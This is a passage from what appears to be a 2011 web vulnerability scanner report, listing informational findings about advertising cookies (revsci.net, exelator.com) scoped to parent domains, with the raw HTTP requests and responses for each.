rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39zMJZjpn557JwHIRqQjgYATtJkLnfaG2qg26X5FhLavzzC9h18LIqIAEiQUbBEgS1qnrAGsSnMmXYtFF6O9NSG0d9Th00OxdjL0rAC2k7l1HlvXJXf/YR0wRu61hIrIc1FaF2JTcrssS7xhdmOsiDwP1R4hwu3SvUtjRfPy1yofzFWLy8DjgpF9Vu7y4QwN/GkQ2/AyzquXyJjHCzknvDbCz6nsZ1c0/zvhv0W+qBEtF79B0Pql0zgq8jJvWvQ5VkxFk4eMp6+fJpD5GQL+QJdHzVdawu07b0A9loBw90WAMSKE0I8mgTw1pOaMgEWar402fI5latT9yANSkAB2Lf1qfu+EhE2ChS5WN/EjGtkKH43+wJlR7Pjdeevg3qnD/7IxpLRlE9ejyrT+7nQKNH8d89unWyeFM/168Lh8zsOxtTSECyBTgJJbQpSMDmhuS6oZKVNi4E4vgVo+qICGaCwqqFmt8xT0nvsitok/EOj3ovnlLV7cBNznhaclXHp+UFCT/HJofMu4j0VfsoRMtw0Xh7B+Uh9gu2dSmj4yWC3Z8hioKqo8WEgfACSEqsCQphySRsy42iZ9q3KRSy4a0i6w8eF+UnIDBhNhGu3/JZrTMJ5HHqve2KS6PN6LBlg9I3RkUio0gdasO+K59I7XpNIm5xgLYO8RrAPbPDNm/zJdifrr6zESJmDtakc4+/YsbioIt6v912EosGy9V3SZDkpwymv+xuZCXUR2WE/tfnymMHMbPwXd+eRsR9kHjmp3eK3Z7OKG56q0Q7v9m+BQoybX50UGJLl8xnhVaSkOBXpQQ97Vnh/pLFs7DniXDWm87NxAaJub6CAoDJ8BPpfcyaeIPe0aTrJMNqkaHjZplxRL+RNYCPTenQCV4d8z2x5yfGMTc6oi8d7OwLKwXdekey590ltmfqTJm44gduD7mRI3rLNNjlfSfzLsVRwmWk0uPoi62sZyGV1I15UgM+FbjvzZnISOQlJVI2MVhFnuE3TTRYQyPq8alwRZ0HvQCOEFaOBxcO3i+WLTAhNybFKJ90D9tReNLg9rYbLZW8VFGFTAjKToU/vK+X36h1I8tNR22tIWe8AfFSe8o+HAeOufZB3wjKYrd7KvYSV+rChZtSxWzg7DVcSCw0QRmZwPfygPsfHZ6TENLHOF7FNECzkjpRQQVzJNctcKy/0lTCVsZxYxxS6AgdbDDSU7qW6xY1bGD6XdXq23kqkeUbL3eEMrzr5vKhhLV8I6BLbux2HPa7QsnuvgjidU+f6cPLPCF6CC8PfxYa/rnlrE2z1obshMZit5GOS5o4PnZb5twji9BFVScBCODUAG6wc0OiaX5LiLS7N129PD9WZU9/BEUzAha9Kn0w5eJqhMod90zFoWDZHjzi5t4WGjHFUjD6C3KDW9sAafx0zH0p4f3dfoul5iFtoj2aPMl+M16V3hiaCxPbsNCA422b7Tu/LEHBIPgBFF7Hzd72ePmPS2lYWNWPiP7JM9AaqBFwLhG0UkT1qJGFvQLFEx2F7H8DQuk1r5RsKRBa2g788dWavjGgrRcIjvuJDin6OVs+NzRJa3AYHrVZ66RV2d6Dg1EtFomz27t8WRoUrWsGh1eH/7YSIR+xw==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:27 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:33:26 GMT
Content-Length: 6504

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
8.46. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=201&j=w&g=001 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=4*001&rannum

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: text/html
Set-Cookie: xltl=eJxLtDK0qi62MrZSCvV0UbIGsoyslExNUwxT0yxSDNIsLJMN0kwSjVLSLMwSE1NMjExSjBKNlaxrAbT3D5Q%253D; expires=Fri, 09-Sep-2011 13:34:32 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJxLtDKwqq4FAAZPAf4%253D; expires=Fri, 09-Sep-2011 13:34:32 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJxLtDK1qi62MjSyUjIyMHQwAGJLS0sjJetEKyOr6kwrQ2sgNrU0BlIGMGYthnpDkHpjNPVG1hAusj5zuDbidADFDAyJNzs1IjUnsSSVOLNrAWxAQVk%253D; expires=Fri, 09-Sep-2011 13:34:32 GMT; path=/; domain=.exelator.com
Date: Thu, 12 May 2011 13:34:32 GMT
Server: HTTP server
Content-Length: 110

<script> document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');</script>
8.47. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=071&j=0&buid=ED7381A8-F9AB-49E0-BC2C-2A944C186892 HTTP/1.1
Host: loadm.exelator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=4*001&rannum

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJwdi7EKwjAQQP%252Fl9kDuEtO765SkFdwE6SxJTKCzOIn%252FbnV7PN4rSvp%252BqlPYLgvMB5FCadjEt9C491pqdcPyJOVUxjgk9l%252BHqPDaH%252FcbWX%252Fd0n8NCusyOcbI5iwxGS%252BrNSlTNhTF%252B4wcWAjmzxe4UR9e; expires=Fri, 09-Sep-2011 13:34:31 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJxLtDK2qi62MjS1Ugo2MjAJCHWqMTB0sLS0NFWyzgQKWxpbA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrUyI0GeALIssYQSXQNdjDpeBC9bi0VALAKpDMIo%253D; expires=Fri, 09-Sep-2011 13:34:31 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJxLtDK1qi62MjSyUjIyMHEwMDd0sLS0NFKyTrQysqrOtDK0BmJTS2MgZQBj1mKoNwWpN0ZTb2QN4SLrM4drI04HUMzAhHizUyNScxJLUokzuxYAhgBBfg%253D%253D; expires=Fri, 09-Sep-2011 13:34:31 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Wed, 12-May-2010 13:34:30 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Wed, 12-May-2010 13:34:30 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNLY3jzeONDEziDcwN403iDZWsa2sBRywNDw%253D%253D; expires=Fri, 09-Sep-2011 13:34:31 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Thu, 12 May 2011 13:34:31 GMT
Server: HTTP server

8.48. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=238&g=001&ctg=Sports&subctg=Fight%20Sports&writertopic=Fight%20Sports%20Examiner&place=National&topic=Fight%20Sports&citystate=&section=Fight%20Sports&headline=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th,%20New%20'face'%20and%20new%20feuds HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxljk1rAjEQhv9L7oHMZGaSjKf9SGHBLlIr9CZmjSgU9rDYS%252FG%252Ftwq92NvLw%252FPAe1DW70W9mt3Qm9XvQjUQmEoRdoJ%252B4lLJn6aDKxwmn8Ad090DUHO9HPdbdDSM3SMVNZOvyELVhliKpVNlWxyITbXUWKMjcf45b%252FqPO8KgpmvyNo%252FnsHxeh4tfz%252Fz%252BNu%252FneWm%252FXv9Vm%252FGBkhoMSD6Kg4QYIglCfLY3u%252FbvIqZMvo8vlrFjS11obYu5sQ4iUJIsEsCsbj9wpUlM; EVX=eJyNkEsOgzAMRO%252FCCTxOgpNwGIsl6y4r7t44oSDKp%252BwivRnHz2NO%252BT3llFIYxhztTcMrI%252BYOQUhFmbxSgLKiG6aMlUY2iqhErKTOKP9Q6xIKZaPuhMJonew36oxyql20yWFPgaDkSrN1%252B5Um2xkiS7dS2Si%252B%252F8piNBd5QgQVfez1j4JzvVRfouFf9Hip%252FS341tbd2vobW1uRhcSd%252BBw%252Baj7yMCouRlyFdyu2JZhPjnq1MTMehn1Kjp6F5w8ZP7gL; BFF=eJztlk1PwzAMhv%252FLfkE%252B2qXpLrAiwSRWJijTOCGOnDkC%252F502STPHsVsYIHHg6sevnQ%252B3eZ9qI%252BvXl1qW9eJOiWLTNm9Cnllry8XquQ8bseqprhfbm7a7un543G%252FuNt1i9VTb6hNCASkEKgKsMZGgQp0UxXbIVgHIHpQhDkJJriZAyxRpudykSNjw%252BcUhbHjpaaXAhj2FQEWANSYSVOh2eziTfXejANAuTmRaISspEDhfdznQLg4z4yXu00tM9uQpsaceYE28xD3MN6CQohd85BAUoFGmMmDGJqs2XNWGUMFrVtyReMpfc0ms02k0v07PiXW6muw6d%252B3UODpKrXPXcuO4a7k2%252FHE4yrchj2PQTB2H49RxDDUzlWtYynAWJiA97ssRELQ%252BiHMLHwYR9wvcXLq6ygijAVuOCOYLF8yTfR2U6T5TnBk%252F7AygSco4HBhWHM6dFQ%252FHy4nHL5gTuw%252BVFzcz4iaHw0VJWVIX1YeJUzO6qqTBV10o8qoLlSZ20mjwSIyJQxi2kmMmHMOEZKsAt61UkFiBgUQgjEGuiIBSFP3bIRKQDQ6qmA4OgoRYTonJznHqmM5%252B6pjOQEx2HsVU5%252BPI0p3DyNKdoZjqHMUJDP%252FM3f06fVXtaDCOFAIVAdaYSGC%252BAYXS9y9vpCAoQKNMhaqC7zEXp%252FB90t5RTs5yts1O2rZTPRpvxSjXlX5rnzZZM56Kt06zLulEM4QGtiHgtOf5hrX5hoPhjcqMJznJeuT%252FkwzyDoMxE1PWgbUJP%252BoKqP8zgn%252FRFeQTiyHjCr7qAZgX%252F%252F99%252F3%252FfT3%252Ff%252BWd89sX%252BrYf5A2A8Po8%253D; 